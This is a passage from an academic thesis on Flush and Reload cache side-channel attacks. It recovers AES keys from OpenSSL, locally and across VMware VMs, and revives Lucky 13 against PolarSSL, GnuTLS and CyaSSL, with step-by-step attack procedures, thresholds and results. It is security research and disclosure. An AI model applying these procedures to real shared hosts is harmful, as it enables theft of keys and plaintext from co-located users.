4.4.3 Attack Scenario 1: Spy Process
In this first scenario we will attack an encryption server running in the same OS as
the spy process. The encryption server just receives encryption requests, encrypts a
plaintext and sends the ciphertext back to the client. The server and the client are
running on different cores. Thus, the attack consists in distinguishing accesses from
the LLC, i.e. L3 cache, which is shared across cores. and the main memory. Clearly,
if the attacker is able to distinguish accesses between LLC and main memory, it will
be able to distinguish between L1 and main memory accesses whenever server and
client co-reside in the same core. In this scenario, both the attacker and victim are
using the same shared library. KSM is responsible for merging those pages into one
unified shared page. Therefore, the victim and attacker processes are linked through
the KSM deduplication feature.
Our attack works as described in the previous section. First the attacker dis-
covers the offset of the addresses of the T tables with respect to the begining of
the library. Next, it issues encryption requests to the server, and receives the cor-
responding ciphertext. After each encryption, the attacker checks with the Flush
and Reload technique whether the chosen T table values have been accessed. Once
enough measurements have been acquired, the key recovery step is performed. As
we will see in our results section, the whole process takes less than half a minute.
Our attack significantly improves on previous cache side channel attacks such as
evict + time orprime and probe [OST06]. Both attacks were based on spy processes
targeting the L1 cache. A clear advantage of our attack is that —since it is targeting
the last shared level cache— it works across cores.
A more realistic attack scenario was proposed earlier by Bernstein [Ber04] where
the attacker targets an encryption server. Our attack similarly works under a re-
alistic scenario. However, unlike Bernstein’s attack [Ber04], our attack does not
require a profiling phase that involves access to an identical implementation with a
known-key. Finally, with respect to the previous Flush and Reload attack in AES,
our attack does not need to interrupt the AES execution of the encryption server.
We will compare different attacks according to the number of encryptions needed in
Section 4.4.6.
44
4.4.4 Attack Scenario 2: Cross-VM Attack
In our second scenario the victim process is running in one virtual machine and the
attacker in another one but on the physical server, possibly on different cores. For
the purposes of this study it is assumed that the co-location problem has been solved
using the methods proposed in [RTSS09]. The attack exploits memory overcommit-
ment features that some hypervisors such as VMware provide. In particular, we
focus in memory deduplication. The hypervisor will search periodically for identical
pages across VMs to merge both pages into a single page in the memory. Once this
is done (without the intervention of the attacker) both the victim and the attacker
will access the same portion of the physical memory enabling the attack. The at-
tack process is the same as in Scenario 1. Moreover, we later show that the key is
recovered in less than a minute, which makes the attack practical .
We discussed the improvements of our attack over previous proposals in the
previous scenario except the most important one: We believe that the evict+time ,
prime and probe and time collision attacks will be rather difficult to carry out in
real cloud environment. The first two, as we know them so far, are targeting the L1
cache, which is not shared across cores. The attacker would have to be in the same
core as the victim, which is a much stronger assumption than being just in the same
physical machine. Finally, targeting the CFS [GBK11] to evict the victim process,
requires for the attacker’s code to run in the same OS, which will certainly not be
possible in a virtualized environment.
4.4.5 Experiment Setup and Results
We present results for both a spy process within the native machine as well as the
cross-VM scenario. The target process is executed in Ubuntu 12.04 64 bits, kernel
version 3.4, using the C-implementation of AES in OpenSSL 1.0.1f for encryption.
This is used when OpenSSL is configured with no-asm andno-hw option. We want
to remark that this is not the default option in the installation of OpenSSL in most
of the products. All experiments were performed on a machine featuring an Intel i5-
3320M four core clocked at 3.2GHz. The Core i5 has a three-level cache architecture:
The L1 cache is 8-way associative, with 215bytes of size and a cache line size of 64
bytes. The level-2 cache is 8-way associative as well, with a cache line width of 64
bytes and a total size of 218bytes. The level-3 cache is 12-way associative with a
total size of 222bytes and 64 bytes cache line size. It is important to note hypervisor
each core has private L1 and L2 caches, but the L3 cache is shared among all cores.
Together with the deduplication performed by the VMM, the shared L3 cache allows
the adversary to learn about data accesses by the victim process.
The attack scenario is as follows: the victim process is an encryption server
handling encryption requests through a socket connection and sends back the ci-
phertext, similar to Bernstein’s setup in [Ber04]. But unlike Bernstein’s attack,
where packages of at least 400 bytes were sent to deal with the noise, our server
45
only receives packages of 16 bytes (the plaintext). The encryption key used by the
the server is unknown to the attacker. The attack process sends encryption queries
to the victim process. All measurements such as timing measurements of the reload
step are done on the attacker side. In our setup, each cache line holds 16 T table
values, which results in a 7 .6% probability for not accessing a memory block per
encryption. All given attack results target only the first cache line of each T table,
i.e. the first 16 values of each T table for Flush and Reload . Note that in the attack
any memory block of the T table would work equally well. Both native and cross-
VM attacks establish the threshold for selecting the correct ciphertext candidates
for the working T table line by selecting those values which are below half of the
average of overall timings for each ciphertext value. This is an empirical threshold
that we set up after running some experiments as follows
threshold =256∑
i=0ti
2·256.
Spy process attack setup:
The attack process runs in the same OS as the victim process. The communication
between the processes is carried out via localhost connection and measures timing
using Read Time-Stamp Counters ( rdtsc ). The attack is set up to work across cores;
the encryption server is running in a different core than the attacker. We believe
that distinguishing between L3 and main memory accesses will be more susceptible
to noise than distinguishing between L1 cache accesses and main memory accesses.
Therefore while working with the L3 cache gives us a more realistic setting, it also
makes the attack more challenging.
Cross-VM attack setup:
In this attack, we use VMware ESXI 5.5.0 build number 1623387 running Ubuntu
12.04 64-bits guest OSs. We know that VMware implements TPS with large pages
(2 MB) or small pages (4 KB). We decided to use the latter one, since it seems to
be the default for most systems. Furthermore, as stated in [VMWb], even if the
large page sharing is selected, the VMM will still look for identical small pages to
share. For the attack we used two virtual machines, one for the victim and one
for the attacker. The communication between them is carried out over the local IP
connection.
The results are presented in Figure 4.4 which plots the number of correctly re-
covered key bytes over the number of timed encryptions. The dash-dotted line shows
that the spy-process scenario completely recovers the key after only 217encryptions.
Prior to moving to the cross-VM scenario, a single VM scenario was performed to
gauge the impact of using VMs. The dotted line shows that due to the noise in-
troduced by virtualization we need to nearly double the number of encryptions to
46
Figure 4.4: Number of correct key bytes guessed of the AES-128 bit key vs. number
of encryption requests. Even 50,000 encryptions (i.e. less than 5 seconds of inter-
action) result in significant security degradation in both the native machine as well
as the cross-VM attack scenario.
match the key recovery performance of the native case. The solid line gives the
result for the cross-VM attack: 219observations are sufficient for stable full key
recovery. The difference might be due to cpuid like instructions which are emulated
by the hypervisor, therefore introducing more noise to the attack. In the worst case,
both the native spy process and the single VM attack took around 25 seconds (for
400.000 encryptions). We believe that this is due to communication via the local-
host connection. However, when we perform a cross-VM attack, it takes roughly
twice as much time as in the previous cases. In this case we are performing the
communication via local IPs that have to reach the router, which is believed to add
the additional delay. This means that all of the described attacks —even in the cross
VM scenario— completely recover the key in less than one minute !
4.4.6 Comparison to Other Attacks
Next we compare the most commonly implemented cache-based side channel attacks
to the proposed attack. Results are shown in Table 4.1. It is difficult to compare
the attacks, since most of them have been run on different platforms. Many of the
prior attacks target OpenSSL 0.9.8 version of AES. Most of these attacks exploit
the fact that AES has a separate T Table for the last round, significantly reducing
47
Table 4.1: Comparison of cache side channel attack techniques against AES
Attack Platform Methodology OpenSSL Traces
Spy-Process based Attacks:
Collision timing [BM06] Pentium 4E Time measurement 0.9.8a 300.000
Prime+probe [OST06] Pentium 4E L1 cache prime-probing 0.9.8a 16.000
Evict+time [OST06] Athlon 64 L1 cache evicting 0.9.8a 500.000
Flush+Reload (CFS) [GBK11] Pentium M Flush+reload w/CFS 0.9.8m 100
Flush+Reload [IIES14b] i5-3320M L3 cache Flush+reload 0.9.8a 8.000
Bernstein [AE13] Core2Duo Time measurement 1.0.1c 222
Flush+Reload [IIES14b] i5-3320M L3 cache Flush+reload 1.0.1f 100.000
Cross-VM Attacks:
Bernstein [IIES14a]1i5-3320M Time measurement 1.0.1f 230
Our attack(VMware) i5-3320M L3 cache Flush and reload 1.0.1f2400.000
1Only parts of the key were recovered, not the whole key.
2The AES implementation was not updated for the recently released OpenSSL 1.0.1g and 1.0.2
beta versions. So the results for those libraries are identical.
the noise introduced by cache miss accesses. Hence, attacks on OpenSSL 0.9.8
AES usually succeed much faster, a trend confirmed by our attack results. Note
that our attack, together with [AE13] and [IIES14a] are the only ones that have
been run on a 64 bit processor. Moreover, we assume that due to undocumented
internal states and advanced features such as hardware prefetchers, implementation
on a 64 bit processor will add more noise than older platforms running the attack.
With respect to the number of encryptions, we observe that the proposed attack
has significant improvements over most of the previous attacks.
Spy process in native OS:
Even though our attack runs in a noisier environment than Bernstein’s attack, Evict
and Time , and cache timing collision attacks, it shows better performance. Only
Prime and Probe andFlush and Reload using CFS show either comparable or better
performance. The proposed attack has better performance than Prime and Probe
even though their measurements were performed with the attack and the encryption
being run as one unique process. The Flush and Reload attack in [GBK11] exploits a
much stronger leakage, which requires that attacker to interrupt the target AES
between rounds (an unrealistic assumption). Furthermore, Flush and Reload with
CFS needs to monitor the entire T tables, while our attack only needs to monitor a
single line of the cache, making the attack much more lightweight and subtle.
Cross-VM attack:
So far there is only one publication that has analyzed cache-based leakage across
VMs for AES [IIES14a]. Our attack shows dramatic improvements over [IIES14a],
which needs 229encryptions (hours of run time) for a partial recovery of the key.
Our attack only needs 219encryptions to recover the full key. Thus, while the attack
48
presented in [IIES14a] needs to interact with the target for several hours, our attack
succeeds in under a minute and recovers the entire key. Note that the CFS enabled
Flush and Reload attack in [GBK11] will not work in the cross-VM setting, since
the attacker has no control over victim OS’s CFS.
4.5 Flush and Reload Attacking Transport Layer
Security: Re-viving the Lucky 13 Attack
Although cache attacks are usually applied to cryptographic algorithms, virtually
any security critical software that has non-constant execution flow can be targeted
by the Flush and Reload attack. In this section, we show an example of such
an application. In particular, we show for the first time that cache attacks can
be utilized to attack security protocols like the Transport Layer Security (TLS)
protocol, by re-implementing the Lucky 13 attack that was believed to be closed by
the security community.
The Lucky 13 attack targets a vulnerability in the TLS (and DTLS) protocol
design. The vulnerability is due to MAC-then-encrypt mode, in combination with
the padding of the CBC encryption, also referred to as MEE-TLS-CBC. In the fol-
lowing, our description focuses on this popular mode. Vaudenay [Vau02] showed
how the CBC padding can be exploited for a message recovery attack. AlFardan
et al. [FP13] showed—more than 10 years later—that the subsequent MAC verifi-
cation introduces timing behavior that makes the message recovery attack feasible
in practical settings. In fact, their work includes a comprehensive study of the vul-
nerability of several TLS libraries. In this section we give a brief description of the
attack. For a more detailed description, please refer to the original paper [FP13].
4.5.1 The TLS Record Protocol
The TLS record protocol provides encryption and message authentication for bulk
data transmitted in TLS. The basic operation of the protocol is depicted in Fig-
ure 4.5. When a payload is sent, a sequence number and a header are attached to
it and a MAC tag is generated by any of the available HMAC choices. Once the
MAC tag is generated, it is appended to the payload together with a padding. The
payload, tag, and pad are then encrypted using a block cipher in CBC mode. The
final message is formed by the encrypted ciphertext plus the header.
Upon receiving an encrypted packet, the receiver decrypts the ciphertext with
the session key that was negotiated in the handshake process. Next, the padding
and the MAC tag need to be removed. For this, first the receiver checks whether
the size of the ciphertext is a multiple of the block size and makes sure that the
ciphertext can accommodate minimally a zero-length record, a MAC tag, and at
least one byte of padding. After decryption, the receiver checks if the recovered
padding matches one of the allowed patterns. A standard way to implement this
49
HDR|SQN DATA
DATA TAG PAD
HDR CIPHERTEXTHMAC
CBC 
ENCRYPTIONFigure 4.5: Encryption and authentication in the TLS record protocol when using
HMAC and a block cipher in CBC mode.
decoding step is to check the last byte of the plaintext, and to use it to determine
how many of the trailing bytes belong to the padding. Once the padding is removed,
and the plain payload is recovered, the receiver attaches the header and the sequence
number and performs the HMAC operation. Finally, the computed tag is compared
to the received tag. If they are equal, the contents of the message are concluded to
be securely transmitted.
4.5.2 HMAC
The TLS record protocol uses the HMAC algorithm to compute the tag. The HMAC
algorithm is based on a hash function Hthat performs the following operations:
HMAC (K,m ) =H((K⊕opad)||H((K⊕ipad)||M)
Common choices in TLS 1.2 for Hare SHA-1, SHA-256 and the now defunct MD5.
The message Mis padded with a single 1 bit followed by zeros and an 8 byte
length field. The pad aligns the data to a multiple of 64 bytes. K⊕opad already
forms a 64 byte field, as well as K⊕ipad. Therefore, the minimum number of
compression function calls for a HMAC operation is 4. This means that depending
on the number of bytes of the message, the HMAC operation is going to take more
or less compression functions. To illustrate this, we are repeating the example given
in [FP13] as follows. Assume that the plaintext size is 55 bytes. In this case an 8 byte
length field is appended together with a padding of size 1, so that the total size is 64
bytes. Here in total the HMAC operation is going to take four compression function
calls. However if the plaintext size is 58, an 8 byte length field is attached and 62
bytes of padding are appended to make the total size equal to 128 bytes. In this case,
the total compression function calls are going to be equal to five. Distinguishing the
50
number of performed compression function calls is the basic idea that enables the
Lucky 13 attack.
4.5.3 CBC Encryption & Padding
Until the support of the Galois Counter Mode in TLS 1.2, block ciphers were always
used in cipher block chaining (CBC) mode in TLS. The decryption of each block of
a ciphertext Ciis performed as follows:
Pi=Dk(Ci)⊕Ci−1
Here,Piis the plaintext block and Dk(·) is the decryption under key k. For the
prevalent AES, the block size is 16 bytes. The size of the message to be encrypted
in CBC mode has to be indeed a multiple of the cipher block size. The TLS pro-
tocol specifies a padding as follows: the last padding byte indicates the length of
the padding; the value of the remaining padding bytes is equal to the number of
padding bytes needed. This means that if 3 bytes of padding is needed, the cor-
rect padding has to be 0x02 |0x02|0x02. Possible TLS paddings are: 0x00, 0x01 |0x01,
0x02|0x02|0x02, up to 0xff—0xff |...|0xff. Note that there are several valid paddings
for each message length.
4.5.4 An Attack On CBC Encryption
We now discuss the basics of the Lucky 13 attack. For the purposes of this study
the target cipher is AES in CBC mode, as described above. Again, we use the same
example that AlFardan et al. gave in [FP13]. Assume that the sender is sending 4
non-IV blocks of 16 bytes each, one IV block, and the header number. Let’s further
assume that we are using SHA-1 to compute the MAC tag, in which case the digest
size is 20 bytes. The header has a fixed length of 5 bytes and the sequence number
would have a total size of 8 bytes. The payload would look like this:
HDR|CIV|C1|C2|C3|C4
Now assume that the attacker masks ∆ in C3. The decryption of C4is going to be
as follows:
P∗
4=Dk(C4)⊕C3⊕∆ =P4⊕∆
Focusing on the last two bytes P∗
4(14)|P∗
4(15)three possible scenarios emerge:
Invalid padding
This is the most probable case, where the plaintext ends with an invalid padding.
Therefore, according to TLS protocol, this is treated as 0 padding. 20 bytes of MAC
(SHA-1) are removed and the corresponding HMAC operation in the client side is
51
performed on 44 bytes +13 bytes of header, in total 57 bytes. Therefore the HMAC
evaluates 5 compression function calls.
Valid 0x00 padding
IfP∗
4(15) is 0x00, this is considered as valid padding, and a single byte of padding
is removed. Then the 20 bytes of digest are removed, and the HMAC operation in
client side is done in 43+13 bytes, 56 in total, which takes 5 compression function
calls.
Any other valid padding
For instance, if we consider a valid padding of two bytes, the valid padding would be
0x01|0x01 and 2 bytes of padding are removed. Then 20 bytes of digest are removed,
and the HMAC operation is performed over 42 + 13 = 55 bytes, which means four
compression function calls.
The Lucky 13 attack is based on detecting this difference between 4 and 5 com-
pression function calls. Recall that if an attacker knows that a valid 0x01 |0x01
padding was achieved, she can directly recover the last two bytes of P4, since
0x01|0x01 =P4(14)|P4(15)⊕∆(14)|∆(15)
Note that the successful padding 0 x01|0x01 is more likely to be achieved than any
other longer valid padding, and therefore, the attacker can be confident enough that
it is the padding that was forged. Furthermore, she can keep on trying to recover
the remaining bytes once she knows the first 2 bytes. The attacker needs to perform
at most 216trials for detecting the last two bytes, and then up to 28messages for
each of the bytes that she wants to recover.
4.5.5 Analysis of Lucky 13 Patches
The Lucky 13 attack triggered a series of patches for all major implementations of
TLS [FP13]. In essence, all libraries were fixed to remove the timing side channel
exploited by Lucky 13, i.e. implementations were updated to handle different CBC-
paddings in constant time. However, different libraries used different approaches to
achieve this:
•Some libraries implement dummy functions or processes,
•Others use dummy data to process the maximum allowed padding length in
each MAC checking.
In the following, we discuss these different approaches for some of the most popular
TLS libraries.
52
4.5.6 Patches Immune to Flush and Reload
In this section we will analyze those libraries that are secure against the Flush and
Reload technique.
•OpenSSL: The Lucky 13 vulnerability was fixed in OpenSSL versions 1.0.1,
1.0.0k, and 0.9.8y by February 2013 without the use of a time consuming
dummy function and by using dummy data. Basically, when a packet is
received, the padding variation is considered and the maximum number of
HMAC compression function evaluations needed to equalize the time is calcu-
lated. Then each compression function is computed directly, without calling
any external function. For every message, the maximum number of compres-
sion functions are executed, so that no information is leaked through the time
channel in case of the incorrect padding. Furthermore, the OpenSSL patch
removed any data dependent branches ensuring a fixed data independent ex-
ecution flow. This is a generic solution for microarchitectural leakage related
attacks, i.e. cache timing or even branch prediction attacks.
•Mozilla NSS: This library is patched against the Lucky 13 attack in ver-
sion 3.14.3 by using a constant time HMAC processing implementation. This
implementation follows the approach of OpenSSL, calculating the number of
maximum compression functions needed for a specific message and then com-
puting the compression functions directly. This provides not only a counter-
measure for both timing and cache access attacks, but also for branch predic-
tion attacks.
•MatrixSSL: MatrixSSL is fixed against the Lucky 13 with the release of ver-
sion 3.4.1 by adding timing countermeasures that reduce the effectiveness of
the attack. In the fix, the library authors implemented a decoding scheme that
does a sanity check on the largest possible block size. In this scheme, when
the received message’s padding length is incorrect, Matrix SSL runs a loop as
if there was a full 256 bytes of padding. When there are no padding errors, the
same operations are executed as in the case of an incorrect padding to sustain
a constant time. Since there are no functions that are specifically called in
the successful or unsuccessful padding cases, this library is not vulnerable to
ourFlush and Reload attack. In addition, Matrix SSL keeps track of all errors
in the padding decoding and does the MAC checking regardless of valid or
invalid padding rather than interrupting and finalizing the decoding process
at the first error.
4.5.7 Patches Vulnerable to Flush and Reload
There are some patches that ensure constant time execution and therefore are im-
mune to the original Lucky 13 attack [FP13] which are vulnerable to Flush and
53
Reload . This implies a dummy function call or a different function call tree for valid
and invalid paddings. Furthermore, if these calls are preceded by branch predic-
tions, these patches might also be exploitable by branch prediction attacks. Some
examples including code snippets are given below.
•GnuTLS: uses a dummy wait function that performs an extra compression
function whenever the padding is incorrect. This function makes the response
time constant to fix the original Lucky 13 vulnerability. Since this function is
only called in the case of incorrect padding, it can be detected by a co-located
VM running a Flush and Reload attack.
i f(memcmp ( tag , &ciphertext −>data [ length ] ,
t a g s i z e ) != 0||p a d f a i l e d != 0)
//H M A C was not the same.
{dummy wait(params, compressed , pad failed ,
pad, length+preamble size );}
•PolarSSL: uses a dummy function called mdprocess to sustain constant
time to fix the original Lucky 13 vulnerability. Basically the number of extra
runs for a specific message is computed and added by mdprocess . Whenever
this dummy function is called, a co-located adversary can learn that the last
padding was incorrect and use this information to realize the Lucky 13 attack.
f o r ( j = 0 ; j<extra run ; j++ )
\\We need an extra run
mdprocess( &ssl−>transform in−>
mdctxdec , ssl−>inmsg );]∗
•CyaSSL: was fixed against the Lucky 13 with the release of 2.5.0 on the same
day the Lucky 13 vulnerability became public. In the fix, CyaSSL implements a
timing resistant pad/verify check function called TimingPadVerify which uses
thePadcheck function with dummy data for all padding length cases whether
or not the padding length is correct. CyaSSL also does all the calculations such
as the HMAC calculation for the incorrect padding cases which not only fixes
the original Lucky 13 vulnerability but also prevents the detection of incorrect
padding cases. This is due to the fact that the Padcheck function is called for
both correctly and incorrectly padded messages which makes it impossible to
detect with our Flush and Reload attack.
However, for the correctly padded messages, CyaSSL calls the CompressRounds
function which is detectable with Flush and Reload .Therefore, we monitor the
correct padding instead of the incorrect padding cases.
Correct padding case:
54
PadCheck (dummy, ( byte ) padLen ,
MAX PAD SIZE−padLen−1);
ret = s s l−>hmac( s s l , v e r i f y , input ,
pLen−padLen−1−t , content , 1) ;
CompressRounds( ssl , GetRounds(pLen,
padLen, t ) , dummy);
ConstantCompare ( v e r i f y , input +
( pLen−padLen−1−t ) , t ) != 0)
Incorrect padding case:
CYASSL MSG( ”PadCheck f a i l e d ” ) ;
PadCheck (dummy, ( byte ) padLen ,
MAX PAD SIZE−padLen−1);
s s l−>hmac( s s l , v e r i f y , input ,
pLen−t , content , 1) ;
// s t i l l compare
ConstantCompare ( v e r i f y , input +
pLen−t , t ) ;
4.5.8 Reviving Lucky 13 on the Cloud
As the cross-network timing side channel has been closed (c.f. Section 4.5.5), the
Lucky 13 attack as originally proposed no longer works on the recent releases of
most cryptographic libraries. In this work, we revive the Lucky 13 attack to target
some of these (fixed) releases by gaining information through co-located VMs (a
leakage channel not considered in the original paper) rather than the network timing
exploited in the original attack.
4.5.8.1 Regaining the Timing Channel
Most cryptographic libraries and implementations have been largely fixed to yield
analmost constant time when the MAC processing time is measured over the net-
work. As discussed in Section 4.5.5, although there are some similarities in these
patches, there are also subtle differences which—as we shall see—have significant
implications on security. Some of the libraries not only closed the timing channel
but also various cache access channels. In contrast, other libraries left an open
door to implement access driven cache attacks on the protocol. In this section we
analyze how an attacker can gain information about the number of compression
functions performed during the HMAC operation by making use of leakages due to
shared memory hierarchy in VMs located on the same machine. This is sufficient to
re-implement the Lucky 13 attack.
More precisely, during MAC processing depending on whether the actual MAC
check terminates early or not, some libraries call a dummy function to equalize the
processing time. Knowing if this dummy function is called or not reveals whether
the received packet was processed as to either having a invalid padding, zero length
55
Hardware cycles ×1055 5.5 6 6.5 7Probability
00.050.10.15
4 compression functions
5 compression functionsFigure 4.6: Histogram of network time measured for sent packages with valid (4
compression functions) and invalid (5 compression functions) paddings.
padding or any other valid padding. In general, any difference in the execution
flow between handling a well padded message, a zero padded message or an invalid
padded message enables the Lucky 13 attack. This information is gained by the
Flush and Reload technique if the cloud system enables deduplication features.
To validate this idea, we ran two experiments:
•In the first experiment we generated encrypted packets using PolarSSL client
with valid and invalid paddings and measured the network time as shown in
Figure 4.6. Note that, the network time in the two distributions obtained for
valid and invalid paddings are essentially indistinguishable as intended by the
patches.
•In the second experiment we see a completely different picture. Using Po-
larSSL we generated encrypted packets with valid and invalid paddings which
were then sent to a PolarSSL server. Here instead, we measured the time it
takes to load a specifically chosen PolarSSL library function running inside a
co-located VM. Figure 4.7 shows the probability distributions for a function
reloaded from L3 cache vs. a function reloaded from the main memory. The
two distributions are clearly distinguishable and the misidentification rate (the
area under the overlapping tails in the middle of the two distributions) is very
small. Note that, this substitute timing channel provides much more precise
timing that the network time. To see this more clearly, we refer the reader to
Figure 2 in [FP13] where the network time is measured to obtain two overlap-
ping Gaussians by measurements with OpenSSL encrypted traffic. This is not
a surprise, since the network channel is significantly more noisy.
In conclusion, we regain a much more precise timing channel, by exploiting the
discrepancy between L3 cache and memory accesses as measured by a co-located
attacker. In what follows, we more concretely define the attack scenario, and then
precisely define the steps of the new attack.
56
Hardware cycles200 250 300 350 400 450 500Probability
00.20.40.60.8
Instruction in cache
Instruction in memoryFigure 4.7: Histogram of access time measured for function calls from the L3 cache
vs. a function called from the main memory.
4.5.8.2 New Attack Scenario
In our attack scenario, the side channel information will be gained by monitoring
the cache in a co-located VM. In the same way as in [FP13] we assume that the
adversary captures, modifies, and replaces any message sent to the victim. However,
TLS sessions work in such a way that when the protocol fails to decrypt a message,
the session is closed. This is the reason why we focus in multi-session attacks where
the same plaintext in the same place is being sent to the victim e.g. an encrypted
password sent during user authentication.
The fact that we are working with a different method in a different scenario gives
us some advantages and disadvantages over the previous Lucky 13 work:
Advantages:
•Recent patches in cryptographic libraries mitigate the old Lucky 13 attack,
but are still vulnerable in the new scenario.
•In the new scenario, no response from the server is needed. The old Lucky
13 attack needed a response to measure the time, which yielded a noisier
environment in TLS than DTLS.
•The new attack does not suffer from the network channel noise. This source
of noise was painful for the measurements as we can see in the original paper,
where in case of TLS as many as 214trials were necessary to guess a single
byte value.
Disadvantages:
•Assumption of co-location: To target a specific victim, the attacker has to
be co-located with that target. However the attacker could just reside in a
57
physical machine and just wait for some potential random victim running a
TLS operation.
•Other sources of noise: The attacker no longer has to deal with network chan-
nel noise, but still has to deal with other microarchitectural sources of noise,
such as instruction prefetching. This new source of noise is translated in more
traces needed, but as we will see, much less than in the original Lucky 13
attack. In Section 7.5 we explain how to deal with this new noise.
4.5.8.3 Attack Description
In this section we describe how an attacker uses Flush and Reload technique to gain
access to information about the plaintext that is being sent to the victim.
•Step 1 Function identification: Identify different function calls in the TLS
record decryption process to gain knowledge about suitable target functions for
the spy process. The attacker can either calculate the offset of the function she
is trying to monitor in the library, and then add the corresponding offset when
the Address Space Layout Randomization (ASLR ) moves her user address
space. Another option is to disable the ASLR in the attackers VM, and use
directly the virtual address corresponding to the function she is monitoring.
•Step 2 Capture packet, mask and replace: The attacker captures the
packet that is being sent and masks it in those positions that are useful for
the attack. Then she sends the modified packet to the victim.
•Step 3 Flush targeted function from cache: The Flush and Reload pro-
cess starts after the attacker replaces the original version of the packet and
sends it. The co-located VM flushes the function to ensure that no one but the
victim ran the targeted function. Any subsequent execution of the targeted
function will bear a faster reload time during the reload process.
•Step 4 Reload target function & measure: Reload the corresponding
function memory line again and measure the reload time. According to a
threshold that we set based on experimental measurements, we decide whether
the dummy function was loaded from the cache (implying that the victim has
executed the dummy function earlier) or was loaded from the main memory
(implying the opposite).
Since the attacker has to deal with instruction prefetching, she will be constantly
running Flush and Reload for a specified period of time. The attacker therefore
distinguishes between functions preloaded and functions preloaded and executed ,
since the latter will stay for a longer period of time in the cache.
58
4.5.9 Experiment Setup and Results
In this section we present our test environment together with our detection method
to avoid different cache prefetching techniques that affect our measurements. Finally
we present the results of our experiments for the PolarSSL, GnuTLS and CyaSSL
libraries.
4.5.9.1 Experiment Setup
The experiments were run on an Intel i5-650 dual core at 3.2 GHz. Our physical
server includes 256 KB per core L2 cache, and a 4 MB L3 cache shared between
both cores. We used VMware ESXI 5.5.0 build number 162338 for virtualization.
TPS is enabled with 4 KB pages. In this setting, our Flush and Reload technique
can distinguish between L3 cache and main memory accesses.
For the TLS connection, we use an echo server which reads and re-sends the
message that it receives, and a client communicating with it. Client and echo server
are running in different virtual machines that use Ubuntu 12.04 guest OS. We modify
the echo server functionality so that it adds a jitter in the encrypted reply message,
modeling the Man in the Middle Attack. Once the message is sent, the echo server
uses Flush and Reload to detect different function calls and concludes if the padding
was correct or not.
4.5.9.2 Dealing with Cache Prefetching
Modern CPUs implement cache prefetching in a number of ways. These techniques
affect our experiments, since the monitored function can be prefetched to cache,
even if it was not executed by the victim process. To avoid false positives, it is not
sufficient to detect ifthe monitored functions were loaded to cache, but also for
how long they have resided in the cache. This is achieved by counting the number
of subsequent detections for the given function in one execution. Therefore, the
attack process effectively distinguishes between prefetched functions and prefetched
and executed functions.
We use experiments to determine a threshold (which differs across the libraries)
to distinguish a prefetch and execute from a mere prefetch. For PolarSSL this
threshold is based on observing three Flush and Reload accesses in a row. Assume
thatnis the number of subsequent accesses required to conclude that the function
was executed. In the following, we present the required hits for different libraries,
i.e. the number of n-accesses required to decide whether the targeted function was
executed or not.
4.5.9.3 Attack on PolarSSL1.3.6
Our first attack targets PolarSSL 1.3.6, with TLS 1.1. In the first scenario the
attacker modifies the last two bytes of the encrypted message until she finds the
59
Number of messages (L * 216)0 2 4 6 8 10 12 14 16Success detection probability
00.10.20.30.40.50.60.70.80.91
1 hit required
2 hits required
3 hits requiredFigure 4.8: (PolarSSL 1.3.6) Success probability of recovering P14andP15vs.L,
for different number of hits required. Lrefers to the number of 216traces needed,
so the total number of messages is 216∗L.
∆ that leads to a 0x01 |0x01 padding. Recall that 216different variations can be
performed in the message. The first plot shows the success probability of guessing
the right ∆ versus L, whereLrefers to the number of 216traces needed. For
exampleL= 4 means that 216∗4 messages are needed to detect the right ∆. Based
on experimental results, we set the access threshold such that we consider a hit
whenever the targeted function gets two accesses in a row.
The measurements were performed for different number of required hits. Fig-
ure 4.8 shows that requiring a single hit might not suffice since the attacker gets false
positives, or for small number of messages she may miss the access at all. However
when we require two hits, and if the attacker has a sufficient number of messages
(in this case L= 23), the probability of guessing the right ∆ is comfortably close to
one. If the attacker increases the limit further to ensure an even lower number of
false positives, she will need more messages to see the required number of hits. In
the case of 3 hits, L= 24is required to have a success probability close to one.
Figure 4.9 shows the success probability of correctly recovering P13, once the
attacker has recovered the last two bytes. Now the attacker is looking for the padding
0x02|0x02|0x02. We observed a similar behavior with respect to the previous case
where with L= 8 and with a two hits requirement we will recover the correct byte
with high probability. Again if the attacker increases the requirement to 3 hits, she
will need more measurements; about L= 16 is sufficient in practice.
60
Number of messages (L * 28)0 2 4 6 8 10 12 14 16Success detection probability
00.10.20.30.40.50.60.70.80.91
1 hit required
2 hits required
3 hits requiredFigure 4.9: (PolarSSL 1.3.6) Success probability of recovering P13assumingP14,P15
known vsL, for different number of hits required. Lrefers to the number of 28
traces needed, so the total number of messages is 28∗L.
4.5.9.4 CyaSSL 3.0.0
Recall that the attack is much more effective if the attacker knows any of the pre-
ceding bytes of the plaintext, for example the last byte P15of the plaintext. This
would be the case in a Javascript/web setting where adjusting the length of an ini-
tial HTTP request an attacker can ensure that there is only one unknown byte in
the HTTP plaintext. In this case, the attacker would not need to try 216possible
variations but only 28variations for each byte that she wants to recover. This is the
scenario that we analyzed in CyaSSL TLS 1.2, where we assumed that the attacker
knowsP15and she wants to recover P14. Now the attacker is again trying to obtain
a 0x01|0x01 padding, but unlike in the previous case, she knows the ∆ to make the
last byte equal to 0x01. The implementation of CyaSSL behaves very similarly to
the one of PolarSSL, where due to the access threshold, a one hit might lead to false
positives. However, requiring two hits with a sufficient number of measurements is
enough to obtain a success probability very close to one. The threshold is set as
in the previous cases, where a hit is considered whenever we observe two Flush and
Reload accesses in a row.
4.5.9.5 GnuTLS 3.2.0
Finally we present the results confirming that GnuTLS3.2.0 TLS 1.2 is also vul-
nerable to this kind of attack. Again, the measurements were taken assuming that
61
Number of messages (L * 28)0 2 4 6 8 10 12 14 16Success detection probability
00.10.20.30.40.50.60.70.80.91
1 hit required
2 hits required
3 hits requiredFigure 4.10: (CyaSSL3.0.0) Success Probability of recovering P14assumingP15
known vsL, for different number of hits required. Lrefers to the number of 28
traces needed, so the total number of messages would be 28∗L.
the attacker knows the last byte P15and she wants to recover P14, i.e., she wants
to observe the case where she injects a 0x01 |0x01 padding. However, GnuTLS’s
behavior shows some differences with respect to the previous cases. For the case
of GnuTLS, we find that if we set an access threshold of three accesses in a row
(which would yield our desired hit), the probability of getting false positives is very
low. Based on experimental measurements we observed that only when the dummy
function is executed we observe such a behavior. However the attacker needs more
messages to be able to detect one of these hits. Observing one hit indicates with
high probability that the function was called, but we also consider the two hit case
in case the attacker wants the probability of having false positives to be even lower.
Based on these measurements, we conclude that the attacker recovers the plaintext
with very high probability, so we did not find it necessary to consider the three hit
case.
4.6 Flush and Reload Outcomes
In short, we demonstrated that if the memory deduplication requirement is satisfied,
Flush and Reload can have severe consequences to processers/users co-residing in
